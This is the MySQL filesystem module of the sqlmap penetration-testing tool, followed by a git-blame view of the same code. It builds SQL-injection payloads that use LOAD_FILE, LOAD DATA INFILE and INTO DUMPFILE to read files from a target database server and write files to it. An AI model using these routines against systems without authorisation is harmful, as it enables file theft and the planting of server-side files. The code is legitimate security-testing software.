sqlmap/plugins/dbms/mysql/filesystem.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.agent import agent
from lib.core.common import getSQLSnippet
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.decorators import stackedmethod
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import SqlmapNoneDataException
from lib.request import inject
from lib.request.connect import Connect as Request
from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem

class Filesystem(GenericFilesystem):
    def __init__(self):
        GenericFilesystem.__init__(self)

    def nonStackedReadFile(self, rFile):
        infoMsg = "fetching file: '%s'" % rFile
        logger.info(infoMsg)

        result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)

        return result

    def stackedReadFile(self, rFile):
        infoMsg = "fetching file: '%s'" % rFile
        logger.info(infoMsg)

        self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
        self.getRemoteTempPath()

        tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))

        debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile
        debugMsg += "into temporary file '%s'" % tmpFile
        logger.debug(debugMsg)
        inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile))

        debugMsg = "loading the content of hexadecimal encoded file "
        debugMsg += "'%s' into support table" % rFile
        logger.debug(debugMsg)
        inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))

        length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

        if not isNumPosStrValue(length):
            warnMsg = "unable to retrieve the content of the "
            warnMsg += "file '%s'" % rFile

            if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                warnMsg += ", going to fall-back to simpler UNION technique"
                logger.warn(warnMsg)
                result = self.nonStackedReadFile(rFile)
            else:
                raise SqlmapNoneDataException(warnMsg)
        else:
            length = int(length)
            chunkSize = 1024

            if length > chunkSize:
                result = []

                for i in xrange(1, length, chunkSize):
                    chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
                    result.append(chunk)
            else:
                result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)

        return result

    @stackedmethod
    def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
        logger.debug("encoding file to its hexadecimal string value")

        fcEncodedList = self.fileEncode(wFile, "hex", True)
        fcEncodedStr = fcEncodedList[0]
        fcEncodedStrLen = len(fcEncodedStr)

        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
            warnMsg = "the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warn(warnMsg)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        pushValue(kb.forceWhere)
        kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
        sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
        unionUse(sqlQuery, unpack=False)
        kb.forceWhere = popValue()

        warnMsg = "expect junk characters inside the "
        warnMsg += "file as a leftover from UNION query"
        singleTimeWarnMessage(warnMsg)

        return self.askCheckWrittenFile(wFile, dFile, forceCheck)

    def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
        logger.debug("encoding file to its hexadecimal string value")

        fcEncodedList = self.fileEncode(wFile, "hex", True)
        fcEncodedStr = fcEncodedList[0][2:]
        fcEncodedStrLen = len(fcEncodedStr)

        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
            warnMsg = "the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warn(warnMsg)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr)
        query = agent.prefixQuery(query)        # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
        payload = agent.payload(newValue=query)
        page = Request.queryPage(payload)

        warnMsg = "expect junk characters inside the "
        warnMsg += "file as a leftover from original query"
        singleTimeWarnMessage(warnMsg)

        return self.askCheckWrittenFile(wFile, dFile, forceCheck)

    def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
        debugMsg = "creating a support table to write the hexadecimal "
        debugMsg += "encoded file to"
        logger.debug(debugMsg)

        self.createSupportTbl(self.fileTblName, self.tblField, "longblob")

        logger.debug("encoding file to its hexadecimal string value")
        fcEncodedList = self.fileEncode(wFile, "hex", False)

        debugMsg = "forging SQL statements to write the hexadecimal "
        debugMsg += "encoded file to the support table"
        logger.debug(debugMsg)

        sqlQueries = self.fileToSqlQueries(fcEncodedList)

        logger.debug("inserting the hexadecimal encoded file to the support table")

        for sqlQuery in sqlQueries:
            inject.goStacked(sqlQuery)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
        inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True)

        return self.askCheckWrittenFile(wFile, dFile, forceCheck)
reverted a previous commit as not all distributions create a link file /usr/bin/python2 to the Python interpreter 2013-02-14 15:32:17 +04:00			`#!/usr/bin/env python`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`"""`
Update of copyright years 2018-01-02 02:48:10 +03:00			`Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 15:50:46 +03:00			`See the file 'LICENSE' for copying permission`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`"""`

Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`from lib.core.agent import agent`
			`from lib.core.common import getSQLSnippet`
minor fix 2011-09-21 02:16:56 +04:00			`from lib.core.common import isNumPosStrValue`
minor bug fix 2012-05-18 12:51:50 +04:00			`from lib.core.common import isTechniqueAvailable`
Minor improvement to UNION file write 2015-07-26 18:02:46 +03:00			`from lib.core.common import popValue`
			`from lib.core.common import pushValue`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.common import randomStr`
minor fix 2011-09-21 02:16:56 +04:00			`from lib.core.common import singleTimeWarnMessage`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Potential patch for Issues like #3013 and #3017 2018-04-01 13:45:47 +03:00			`from lib.core.decorators import stackedmethod`
code refactoring regarding charsetType inside inference/bisection 2012-02-29 18:36:23 +04:00			`from lib.core.enums import CHARSET_TYPE`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`from lib.core.enums import DBMS`
few fixes related to bug report by Shadow Folder (AttributeError: 'list' object has no attribute 'isdigit') 2012-04-04 13:25:05 +04:00			`from lib.core.enums import EXPECTED`
minor fix 2012-05-24 22:05:33 +04:00			`from lib.core.enums import PAYLOAD`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import PLACE`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`from lib.core.exception import SqlmapNoneDataException`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.request import inject`
Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`from lib.request.connect import Connect as Request`
Moved folder 2011-06-18 16:34:41 +04:00			`from lib.techniques.union.use import unionUse`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from plugins.generic.filesystem import Filesystem as GenericFilesystem`

			`class Filesystem(GenericFilesystem):`
			`def __init__(self):`
			`GenericFilesystem.__init__(self)`

proper naming 2012-07-06 18:13:50 +04:00			`def nonStackedReadFile(self, rFile):`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`infoMsg = "fetching file: '%s'" % rFile`
			`logger.info(infoMsg)`

Patch regarding Issue #774 (SELECT is redundant in case of LOAD_FILE) 2014-08-16 16:23:07 +04:00			`result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`return result`

			`def stackedReadFile(self, rFile):`
			`infoMsg = "fetching file: '%s'" % rFile`
			`logger.info(infoMsg)`

			`self.createSupportTbl(self.fileTblName, self.tblField, "longtext")`
			`self.getRemoteTempPath()`

			`tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))`

Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "into temporary file '%s'" % tmpFile`
			`logger.debug(debugMsg)`
			`inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile))`

Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "loading the content of hexadecimal encoded file "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "'%s' into support table" % rFile`
			`logger.debug(debugMsg)`
			`inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))`

few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
minor fix 2011-09-21 02:16:56 +04:00			`if not isNumPosStrValue(length):`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`warnMsg = "unable to retrieve the content of the "`
			`warnMsg += "file '%s'" % rFile`

			`if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):`
I am back on stage and here to stay!!! to start.. a removal of confirm switch which masked cases where file write operations failed when set to False automatically, now at least it asks the user and defaults to Yes 2012-07-02 02:25:05 +04:00			`warnMsg += ", going to fall-back to simpler UNION technique"`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`logger.warn(warnMsg)`
proper naming 2012-07-06 18:13:50 +04:00			`result = self.nonStackedReadFile(rFile)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`else:`
Replacing old and deprecated raise Exception style (PEP8) 2013-01-04 02:20:55 +04:00			`raise SqlmapNoneDataException(warnMsg)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`else:`
			`length = int(length)`
Minor updates 2018-01-31 13:13:08 +03:00			`chunkSize = 1024`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor updates 2018-01-31 13:13:08 +03:00			`if length > chunkSize:`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`result = []`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Minor updates 2018-01-31 13:13:08 +03:00			`for i in xrange(1, length, chunkSize):`
			`chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`result.append(chunk)`
			`else:`
few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`return result`

Potential patch for Issues like #3013 and #3017 2018-04-01 13:45:47 +03:00			`@stackedmethod`
minor adjustment 2013-01-23 06:10:38 +04:00			`def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`logger.debug("encoding file to its hexadecimal string value")`

Minor code restyling 2011-04-30 17:20:05 +04:00			`fcEncodedList = self.fileEncode(wFile, "hex", True)`
			`fcEncodedStr = fcEncodedList[0]`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`fcEncodedStrLen = len(fcEncodedStr)`

Rewrite from scratch the detection engine. Now it performs checks defined in payload.xml. User can specify its own. All (hopefully) functionalities should still be working. Added two switches, --level and --risk to specify which injection tests and boundaries to use. The main advantage now is that sqlmap is able to identify initially which injection types are present so for instance if boolean-based blind is not supported, but error-based is, sqlmap will keep going and work! 2010-11-28 21:10:54 +03:00			`if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:`
Minor code restyling 2011-04-30 17:20:05 +04:00			`warnMsg = "the injection is on a GET parameter and the file "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen`
			`warnMsg += "bytes, this might cause errors in the file "`
			`warnMsg += "writing process"`
			`logger.warn(warnMsg)`

			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)`
			`logger.debug(debugMsg)`

Minor improvement to UNION file write 2015-07-26 18:02:46 +03:00			`pushValue(kb.forceWhere)`
			`kb.forceWhere = PAYLOAD.WHERE.NEGATIVE`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)`
Minor bug fix so that --file-write on MySQL via UNION query now works again 2011-02-12 02:35:45 +03:00			`unionUse(sqlQuery, unpack=False)`
Minor improvement to UNION file write 2015-07-26 18:02:46 +03:00			`kb.forceWhere = popValue()`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
minor update 2011-06-07 19:13:51 +04:00			`warnMsg = "expect junk characters inside the "`
			`warnMsg += "file as a leftover from UNION query"`
more concise 2011-06-08 18:35:23 +04:00			`singleTimeWarnMessage(warnMsg)`
minor update 2011-06-07 19:13:51 +04:00
minor adjustment 2013-01-23 06:10:38 +04:00			`return self.askCheckWrittenFile(wFile, dFile, forceCheck)`

Implementation for an Issue #647 2018-09-06 01:59:29 +03:00			`def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False):`
			`logger.debug("encoding file to its hexadecimal string value")`

			`fcEncodedList = self.fileEncode(wFile, "hex", True)`
			`fcEncodedStr = fcEncodedList[0][2:]`
			`fcEncodedStrLen = len(fcEncodedStr)`

			`if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:`
			`warnMsg = "the injection is on a GET parameter and the file "`
			`warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen`
			`warnMsg += "bytes, this might cause errors in the file "`
			`warnMsg += "writing process"`
			`logger.warn(warnMsg)`

			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)`
			`logger.debug(debugMsg)`

			`query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr)`
			`query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)`
			`payload = agent.payload(newValue=query)`
			`page = Request.queryPage(payload)`

			`warnMsg = "expect junk characters inside the "`
			`warnMsg += "file as a leftover from original query"`
			`singleTimeWarnMessage(warnMsg)`

			`return self.askCheckWrittenFile(wFile, dFile, forceCheck)`

fixes #187 2013-01-23 05:27:01 +04:00			`def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):`
Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "creating a support table to write the hexadecimal "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "encoded file to"`
			`logger.debug(debugMsg)`

			`self.createSupportTbl(self.fileTblName, self.tblField, "longblob")`

			`logger.debug("encoding file to its hexadecimal string value")`
			`fcEncodedList = self.fileEncode(wFile, "hex", False)`

Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "forging SQL statements to write the hexadecimal "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "encoded file to the support table"`
			`logger.debug(debugMsg)`

			`sqlQueries = self.fileToSqlQueries(fcEncodedList)`

			`logger.debug("inserting the hexadecimal encoded file to the support table")`

			`for sqlQuery in sqlQueries:`
			`inject.goStacked(sqlQuery)`

			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)`
			`logger.debug(debugMsg)`

			`# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html`
			`inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True)`

fixes #187 2013-01-23 05:27:01 +04:00			`return self.askCheckWrittenFile(wFile, dFile, forceCheck)`